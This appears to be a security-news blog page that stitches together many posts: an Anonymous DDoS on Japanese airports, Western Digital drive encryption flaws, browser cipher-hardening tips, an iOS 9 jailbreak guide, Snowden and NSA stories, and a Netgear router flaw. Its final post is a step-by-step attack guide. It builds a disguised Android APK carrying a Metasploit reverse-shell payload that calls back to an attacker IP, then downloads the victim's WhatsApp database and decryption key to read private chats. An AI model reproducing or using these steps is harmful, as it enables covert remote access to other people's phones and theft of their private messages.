Anonymous Hacker Group Performed DDos Attack On Two Japanese Airports



Anonymous has attacked two Japanese airports in protest over the country's practice of dolphin hunting.
On the 10th of October, Narita and Chubu airports in the east of the country, were both subject to DDoS attacks on their websites by the hacktivist group Anonymous, as part of its campaign against dolphin hunting, a practice that, though controversial, is still legal in Japan.
While airport authorities claimed that flights were unaffected at either of the airports, Narita airport's website was shut down for eight hours. Anonymous later took credit for the attack over Twitter.

Also See:Flaws In Western Digital self-encrypting external hard disk drives could expose user data
Earlier this year, the website of Taiji, a town in south eastern Japan known for it's dolphin hunting, was shut down in what police suspect was an attack by Anonymous. There have also been recent DDoS attacks on the Japan National Tourism Organisation and Japan's Fishermen's Union.
Japan has attracted the ire of animal rights activists and pressure groups around the world particularly for drive hunting (a pod of dolphins is harassed to confuse and corralled them, then they are caught and killed quickly by driving a metal pin into their necks).
The hacktivist group hinted at the attack the day before it was carried out. The group tweeted that is was to perform attacks on two major Japanese airports, according to police. The hashtag #opkillingbay has spread over twitter to popularise the cause of the diffuse hacktivist group.
The DDoS attack is a long time favorite weapon in the arsenal of the hacktivist. This particular kind of attack paralyses targeted websites by sending them overwhelming amounts of traffic from different networks before effectively shutting them down.
Caroline Baylon, editor of the journal of Cyber Policy and Chatham House's expert on all things cyber, noted to SC that “When it comes to DDoS attacks, these are basic but highly effective attacks that hacker groups use to take down websites on a regular basis.” She went on to point to recent cases of hacker group GhostSec, performing DDoS attacks on Islamic State websites in the wake of the Charlie Hebdo massacre of January 2015.
Attacks of this kind are not rare, but they aren't often seen performed on a large public institution like an airport. The same can be said for Anonymous, which tends to target private organisations like Koch industries, or most famously, the Church of Scientology.
“Hacktivism, or rather the use of DDoS being attributed to hacktivist groups is not particularly new,” says Raj Samani, CTO of Intel Security. He spoke to SC, saying that: “One of the challenges of course is to determine whether specific attacks are indeed conducted by such well-known groups, or used as a potential smokescreen.”
Anonymous' most recent operation of note was #OpBEAST, a campaign against fetish sites that specialised in bestiality, culminating in the successful shutting down of the world's most popular bestiality forum, beastforum.com and the defacing of several others.

Flaws In Western Digital self-encrypting external hard disk drives could expose user data

Security Researcher Gunnar Alendal,Christian Kison and modg checked the working of WD self-encrypting external hard disk and discovered the design flaws which allow them to decrypt the data without user password.Even researcher discovered that ,flaw allow them to crack the user password using brute force attack.
Researchers easily found the design flaw based on the microchip used for encrypting the data of user.
In some cases,researchers found that,the encryption is performed by the chip that bridges the USB and SATA interfaces. In other cases the encryption is done by the HDD's own SATA controller, with the USB bridge handling only the password validation.
The researchers examined WD external drive models with six different USB bridges from JMicron Technology, Symwave, Initio and PLX Technology. Due to setup change between the different chips, Researchers Discovered serious security issues varied from device to device based on the implementation technique, the researchers said in a recently released paper.

How WD Encryption Works?

The way encryption works in these drives is that a user-selected password is used to create a key encryption key (KEK). This is a cryptographic hash of the password generated with the SHA256 function.
The KEK is then used to encrypt a separately generated data encryption key (DEK). This encrypted version of the DEK, known as the eDEK, is stored in the USB bridge's EEPROM, in a hidden sector on the hard disk itself or in a special disk region called the service area.
The eDEK is decrypted when the user inputs the correct password in the drive's software that runs on the host computer and the resulting DEK is then used by the chip to perform the encryption and decryption operations on the fly.

Here's the Flaw

For four of the tested USB bridges the researchers found methods of extracting the eDEK, allowing for offline brute-force attacks to guess the KEK and subsequently recover the DEK.
As Per Researchers, all WD drives use a hardcoded salt -- a unique string that gets combined with the user-supplied passwords before hashing for added complexity -- and a fixed iteration count for the hashing itself.

Attackers could use large collections of common passwords to pre-compute their corresponding KEKs. These could then be used to try to decrypt the extracted eDEKs and ultimately the data stored on the drives.But in some cases ,attacker need not have to use brute-force tool  and password guessing to decrypt the data because researchers also found authentication flaw in WD external hard drive which provide researcher backdoor access to the encrypted data.
Out of 6 chip,in one chip, KEK is stored in plain text in its EEPROM, making its recovery easy. In another chip, the KEK was stored in encrypted form, but it was encrypted with a hardcoded key that can also be extracted. For a third chip the KEK can be extracted from RAM using a vendor-specific command.
For one JMicron chip, the researchers managed to use a commercial data recovery tool to delete some bits from a drive's service area, completely unlocking the drive's data. This compromises the encryption without the need to recover any password or KEK.
The firmware update process on the tested hard drives does not use cryptographic signature verification and can therefore be hijacked. This could allow attackers to implant malware inside the firmware to infect host computers or to add cryptographic backdoors. There is no easy way to recover from such firmware modifications, the researchers said.

How to Remain Secure Against The NSA Data Decryption Attack.

Researchers Alex Halderman and Nadia Heninger presented a research stating that how NSA Exploits Flaws to Decrypt Huge Amounts of Communications Instead of Securing the Internet. The NSA can decrypt a huge amount of HTTPS, SSH, and VPN connections by means of the Diffie-Hellman key exchange algorithm with 1024-bit primes. Researchers Alex Halderman and Nadia Heninger were also a part of a research group that published a study of the Logjam attack, which took advantage of neglected and obsolete code to impose downgraded, 512-bit parameters for Diffie-Hellman.
While major browser vendors such as Internet Explorer, Chrome, and Firefox have already removed support for 512-bit Diffie-Hellman but however, the 1024-bit Diffie-Hellman is still supported despite being vulnerable to NSA surveillance.
Here's some tips on how to protect yourself from the NSA Data Decryption Attacks.

Web Browser

Always have a look at the Encryption Algorithms & make sure you're using the strongest crypto, that your browser supports. There's an excellent tool, How's My SSL?, that will to test your browser's cipher suite support. The relevant area of the page is the bottom, Given Cipher Suites. You want to make sure that you don't see the text "_DHE_" in the list of ciphersuites - although the Elliptic Curve variant of Diffie-Hellman, represented by suites with "_ECDHE_" is okay. It is important to note that there is a trade-off here: removing your clients support for "_DHE_" ciphers will eliminate the risk of this attack, but it may also removeForward Secrecy support altogether for some sites. Here's how to remove those "_DHE_" cipher suites if you still have them:

Firefox

(tested with 40.0.3)
Open a new tab, enter "about:config" into the location bar and hit the "Enter" key. If you get a warning page, click "I'll be careful, I promise!" This will bring you to the Firefox configuration settings. In the search bar up top, type ".dhe_" and hit the "Enter" key. This should result in two settings being displayed: "security.ssl3.dhe_rsa_aes_128_sha" and "security.ssl3.dhe_rsa_aes_256_sha". Double-click both of them to change the value from "true" to "false".
config settings
Now, if you refresh the How's My SSL page, the "_DHE_" ciphersuites should be gone!

Chrome

After following these steps in the following operating systems, refresh the How's My SSL page, the "_DHE_" ciphersuites should be gone. Note that the hex values for the blacklist correspond to the TLS Cipher Suite Registry

OSX

(tested with 46.0.2490.71, OSX 10.10.5)
Open "automator" and double-click "Run Shell Script". Replace the "cat" command with the following:
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --cipher-suite-blacklist=0x0033,0x0039,0x009E,0xcc15
automator
Save the application to your applications folder with whatever filename you like. In finder, you can drag the application to your dock and use that to launch Chrome without the vulnerable ciphers.

Windows

(tested with 46.0.2490.71, Windows 7)
Right-click the shortcut to your Chrome application, click "properties" and then add the following to the end of the "target": "--cipher-suite-blacklist=0x0033,0x0039,0x009E,0xcc15"
The target then should be similar to the following:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --cipher-suite-blacklist=0x0033,0x0039,0x009E,0xcc15
From now on, open Chrome from this shortcut.

Linux

Tested with 46.0.2490.13, Ubuntu 14.04 LTS
Starting chrome from the command line with the following flag removes the undesired ciphers:
google-chrome --cipher-suite-blacklist=0x0033,0x0039,0x009E,0xcc15

SSH

An excellent guide for hardening your SSH configuration was released after revelations that the NSA can sometimes decrypt SSH connections. The guide is available here.

VPN

OpenVPN

Most VPN software supports the ".ovpn" file extension used by OpenVPN. Many VPN providers will also provide ".ovpn" files to connect using OpenVPN. You can query your OpenVPN client for the ciphers it supports with the following command:
openvpn --show-tls
This list should be ordered by strongest ciphers first. Recent versions of OpenVPN will have "ECDHE" support, but in order to connect your VPN provider has to support the desired cipher as well. Ciphers with just "DHE" can be vulnerable, however OpenVPN often has VPN servers generate their own primes, which mitigates the risk of the precompute attack. Edit your ".ovpn" file with a line containing the strongest ciphers and testing it against your VPN provider to see if it connects properly:
tls-cipher [cipher-1]:[cipher-2]:[cipher-3]
If it does not connect with strong ciphers, contact your VPN provider and request they update their servers to support the strongest ciphers available.

A Man With An Online Army Of More Than 13000 Infected Computers Arrested


A hacker named Sergey Vovnenko has been arrested for hacking into the computer network including Credential hacking,Credit card hacking,wire hacking etc...Apart from that,he operated an army of more than 13000 botnet.

He is an admin of criminal hacking forums "Botnet And Elite" .In other  hacking community,he was also known as  with the following name “Tomas Rimkis,” “Flycracker,” “Flyck,” “Fly,” “Centurion,” “MUXACC1,”  “Stranier,” and “Darklife,”.
According to the statement from U.S. Attorney’s Office,Vovnenko has been facing various charges which includes: wire fraud conspiracy, unauthorized computer access, and aggravated identity theft.

He has been extradited from Italy to face hacking charges in New Jersey court. The U.S secret service was tracking the Vovnenko for a long time and finally with the coordination of Italian Law enforcement agencies he was arrested last June in Naples while trying to stolen credit cards accounts. Italian law enforcement agencies has been investigating with him during all this time and finally they handed Sergey Vovnenko to U.S authorities to face criminal charges in New Jersey Court.

Vovnenko may face upto 30 years in prison for his Wire fraud conspiracy and also have to pay upto $1.5M in fines for his crimes of  Unauthorized Computer Access , Aggravated Identity Theft and Wire Fraud Conspiracy.

How To Jailbreak iOS 9 Using Pangu.


Woooo!Good news jailbreakers the moment has come for which we all have been waiting for.Yeah right iOS 9 jailbreak is finally released by the PanguTeam today.

The Pangu Jailbreak Tool works for iOS 9.0-9.0.2

The Pangu Team Tweeted Today,
"We are very excited to announce the release of Pangu 9, the first untethered jailbreak tool for iOS 9 (http://pangu.io )."

Note: The Pangu Jailbreak Tool for iOS 9 is for Windows only. But ofcourse you can run Windows in virtual machine and jailbreak your device on Mac machine.
This jailbreak tool supports all device running iOS9.

Before Jailbreaking make sure to take Backup of your device.

Step 1: Connect your iOS 9 device to your computer via USB.

Step 2: Disable Find My iPhone.

Step 3: Disable Passcode and Touch ID.

Step 4: Enable Airplane mode.

Step 5: Download the Pangu jailbreak tool for iOS 9.

Step 6: Now run the Pangu Jailbreak Tool.

Step 7: Start the Pangu jailbreak by clicking the Start button and click Already Backup when               prompted.

Step 8: Your iPhone will reboot and Pangu will ask you to put your iPhone back into                               Airplane mode. Once you done that, it will continue the jailbreak process.

Step 9: Then the Pangu tool will request that you open the Pangu app on the                                             iPhone’s Home screen.

Step 10: Once the Pangu app is run, it will ask to you to allow access to your Photo Library.                     Tap the accept button on the Pangu screen to continue.Tap the OK button on the                       “Pangu Would Like to Access Your Photos” pop-up box.

Step 11: Now Your iPhone will reboot once again. Once you reboot, disable Airplane mode,                    and run the Cydia app.

That's it now you have successfully jailbroken your iOS 9 Device.

Microsoft helped the NSA to decrypt the encryption of "Outlook.com,Web chat, Hotmail service, and Skype".



Microsoft worked hand-in-hand with the United States government in order to allow federal investigators to bypass encryption mechanisms meant to protect the privacy of millions of users, Edward Snowden told The Guardian.

According to an article published on Thursday by the British newspaper, internal National Security Agency memos show that Microsoft actually helped the federal government find a way to decrypt messages sent over select platforms, including Outlook.com Web chat, Hotmail email service, and Skype.

The documents, which are reportedly marked top-secret, come in the wake of other high-profile disclosures attributed to Snowden since he first started collaborating with the paper for articles published beginning June 6. The United States government has since indicted Snowden under the Espionage Act, and he has requested asylum from no fewer than 20 foreign nations.

“The latest NSA revelations further expose the tensions between Silicon Valley and the Obama administration,” the journalists wrote. “All the major tech firms are lobbying the government to allow them to disclose more fully the extent and nature of their cooperation with the NSA to meet their customers' privacy concerns. Privately, tech executives are at pains to distance themselves from claims of collaboration and teamwork given by the NSA documents, and insist the process is driven by legal compulsion.”

In the case of Microsoft, however, it appears as if the Bill Gates-founded tech company went out of its way to assist federal investigators.

Just say no to Facebook's Free Internet Service "Internet.org", says inventor of "World Wide Web"


‘Just Say No’ To Internet.org, says Tim Berners-Lee, founder of World Wide Web

Attacking Facebook’s initiative known as Free Basics (formerly Internet.org), the English scientist, Tim Berners-Lee also widely known as the inventor of the World Wide Web said that consumers should say no to such initiatives. The initiative by Facebook aims at offering a limited set of websites and apps free of charge to users in developing countries. Berners-Lee added that if something is being offered in the name of the Internet that is not full Internet, then it’s not really free and public.
In an interview with The Guardian, Berners-Lee said people in prominent markets should “just say no” to the project. Speaking about the importance of privacy and the dangers of government snooping, he added that the initiative was not internet and that there were other ways of reducing the price of access.
“When it comes to compromising on net neutrality, I tend to say ‘just say no’,” he said.
According to the reports by The Guardian, Berners-Lee and the Web We Want festival came together to produce a Magna Carta for the 21st century on the 800th anniversary of the signing of Magna Carta. The Web We Want campaign is promoting five key principles for the future of the Web: freedom of expression online and offline, protection of user data and privacy, affordable access to the net, net neutrality, and a decentralised and open infrastructure.
“In the particular case of somebody who’s offering … something which is branded internet, it’s not internet, then you just say no. No it isn’t free, no it isn’t in the public domain, there are other ways of reducing the price of internet connectivity and giving something … (only) giving people data connectivity to part of the network deliberately, I think is a step backwards.”

Vulnerability In Netgear Router Allow Attacker To Gain Access To "Admin Page Without Credentials"

ShellShock labs researchers identified the vulnerability in the netgear routers.Vulnerability allow the researchers to access the admin page of router without entering the credential.

Researchers discovered the vulnerability in Netgear router firmware N300_1.1.0.31_1.0.1.img, and N300-1.1.0.28_1.0.1.img

Vulnerability in router allow the attacker to gain complete access to admin page and setting.Further attacker could do:

  • Man-in-the-middle-Attack
  • Manage Browser Request
  • Reconfigure DNS setting
  • Traffic Redirection
  • even,downgrade SSL to intercept and monitor the https traffic.

Here's how the attack works?

The attacker can easily exploit the router by reaching the web management interface, which is accessable by default in the internal network.With enabled remote administration,the attacker must have to be connected to the Internet and call a particular URL numerous times after initially failing to authenticate against the router; eventually they would gain access to the administration interface without prompting to enter credentials.

This vulnerability was already reported to netgear by Daniel Haake of Compass in the month of July.As per Daniel,vulnerability reported to netgear company by mail and chat.On Sept. 3,Almost after a month,Netgear sent daniel a beta firmware to determine if the issue had been patched adequately but before releasing the patch publicaly by netgear, Shellshock Labs disclosed the vulnerability publicaly on Sept. 29

ESET Disclosed Fake Android Apps That Bypasses Google Play Store Security Check




ESET unveiled fake apps available at the official Google app store. posing as trendy game cheats, like Cheats for Pou, Guide for SubWay and Cheats for SubWay, these fake apps were installed in quite 200,000 times during a single month, as per ESET security researchers.

The apps deliberately show adverts 30-40 minutes, disrupting traditional use of users’ android devices.

The fake apps, detected as Android/AdDisplay.Cheastom, deploy various techniques to evade detection by Google bouncer - the technology Google uses to stop malicious apps from getting into the Google Play store. additionally, the apps contain self-preservation code to create their removal problematic.

“These aggressive ad-displaying apps plan to hide their capability from security analyst by deploying techniques, that succeeded in being downloaded over 200K times during a single month,” said by Lukas Stefanko, Malware analyst at ESET.

“The anti-Bouncer technique utilized by these apps obtains the ip address of device and accesses its WHOIS record. If the data came back contains the string ‘Google’, then the app assumes it's running in bouncer. When the app detect an emulator or Google bouncer setting, the ads don't seem to be displayed. Instead, the app will merely give game cheats, obviously.”

ESET notified Google and these unwanted applications have currently been taken off from the Google store.

“Although it’s great that Google removed the apps from the android Google Play store when we enlightened them of the problem, it's clear that a lot of attempts are going to be created to bypass Google bouncer and spread apps containing undesirable code,” said by Stefanko.

Bitcoin Transactions Were Under Attack for a Week


Transactions were being duplicated in a malleability attack

A Russian man that calls himself "Alister Maclin" has been disrupting the Bitcoin network for over a week, creating duplicate transactions, and annoying users.
The attack was first noticed by Coinkite, a high-tech Bitcoin platform, and was eventually claimed by Maclin on one of the Bitcoin forums.
According to Bitcoin experts, the attack was not dangerous and is the equivalent of "spam" on the Bitcoin blockchain servers, known in the industry as a "malleability attack."

A malleability attack on the Bitcoin network duplicates transactions

What happens is that when User A sends a transaction to User B, an attacker could intercept the Bitcoin payment and alter its ID (from 0001 to 0002).
When the transaction reaches the Bitcoin blockchain, the technology that registers and logs the payment, it is recorded with both IDs, causing a serious delay in showing the payment as confirmed (usually takes 10 minutes).
Only the transaction ID is affected by a malleability attack, the sender, recipient, and the Bitcoin sum being left intact. All transactions are processed by the Bitcoin blockchain, funds are transferred only once, and eventually one of the duplicate transaction IDs gets invalidated, confirming the other transaction.
Affected users usually get annoyed, in the least serious cases, but some will also resend their transaction after not receiving the normal confirmation, spending double the amount what was usually needed.

The attacker was only performing a "stress test"

According to an interview Maclin gave Vice, he said that he was only performing a stress test on the Bitcoin network, by intercepting transactions and rebroadcasting them with a different ID. Maclin said he stopped for the moment, but he plans future tests in the upcoming weeks.
This attack type is well known in Bitcoin circles, and a fix is being developed for it for almost a year. Coinkit describes the attack as "a simple numeric tweak to one number (S) in the ECDSA signature [used to authenticate Bitcoin transactions]. It’s documented as part of BIP62 and is called the 'low S' requirement. Coinkite always uses the lower S value, but these pranksters have been replacing that with the higher S value."

You Paid For Your Smartphone But Whoever Controls The Software "Owns The Phone"



British spies can hack into your smartphones remotely with just a simple text message and can make audio recordings , take pictures or record video without owners knowing, former US intelligence contractor Edward Snowden said on Monday.

No matter who's the owner the power to control over your smartphones is in their hand."They want to own your phone instead of you," Snowden said in an interview with the BBC's Panorama programme, referring to Britain's Government Communications Headquarters (GCHQ) agency.

Snowden also said that GCHQ used many different interception tools such as "Smurf Suite", after the blue cartoon characters, The Smurfs.
"Nosey Smurf" enabled spies to switch on a smartphone's microphone even if the phone was off, he claimed.

Some other programmes used by GCHQ were named as "Tracker Smurf" and "Dreamy Smurf", which allows them to switch on and off your smartphones remotely, Snowden said.
He said the text message sent by GCHQ to gain access to the phone would not be noticed by its owner. It all works in background of your smartphones as a backdoor service. 

"It's called an 'exploit'," he said.
"When it arrives at your phone it's hidden from you. It's invisible it doesn't display. You paid for your phone but whoever controls the software owns the phone," he added.

The government had declined to comment in line with usual policy on intelligence matters, the BBC said.
After leaking docments to the media about government spy programme, Edward Snowden, has been charged by the US with espionage and theft of government property, has been living in exile in Russia since June 2013.

The British Government & its security agency are planning on implying a new law that would give more powers to intelligence agencies to track online activity to investigate crime.

How To Remotely Decrypt The Whatsapp Database "crypt8"

Before starting the database decryption process,first obtain remote access to android device:

1. Start terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk

[ Lhost=Attacker IP address, Lport=local port ]
This command will generate fake.apk in home directory.

2. Type: msfconsole
This command will start the metasploit framework.

3. Type: use exploit/multi/handler
In order to get multiple session on a single multi/handler.

4. Type: set payload android/meterpreter/reverse_tcp
This will provide the reverse connection from victim to attacker computer.

5. Type: show options
It will show the available options like lhost,lport

6. Set LHOST=192.168.0.2

7. Set LPORT=81

8. EXPLOIT


Now Run the app created in step 1 on your android phone and you'll get a meterpreter session 

Also see:How to hack wifi using social engineering technique

After getting the meterpreter session type below command to download the file:
  • cd /
  • cd /sdcard/WhatsApp
  • ls (Print the current directory)
  • cd Databases
  • download msgstore.db.crypt8 (This will take time, maybe a LOT)
So, the database has been downloaded, now we need key to decrypt the database.
Follow the below command to Obtain the key for databases
  • cd /
  • cd /data/data
  • ls
  • cd com.whatsapp
  • ls
  • cd files
  • ls
  • cp key /sdcard/Download
(Means copy the file 'key' to sdcard>Download folder)

After obtaining the databases and key,Download the simple Github tool to decrpt the databases:
  • Open the application (in windows).
  • Click FIle, then on 'Decrypt .crypt8'
  • In the box, provide the Key file and Database.
  • Click OK, you will see that a 'msgstore.decrypted' file has appeared at your desktop.


  • Open it using the same application, go to 'File' then 'Open'.
  • Provide the Decrypted file generated on desktop, leave the Account name and  the 'wa.db', blank
  • Click 'OK'
  • Now you will see the contact no with the chat details
Note: Rooted smartphone is required to gain database and key from smartphone.

Subscribe to: Posts (Atom)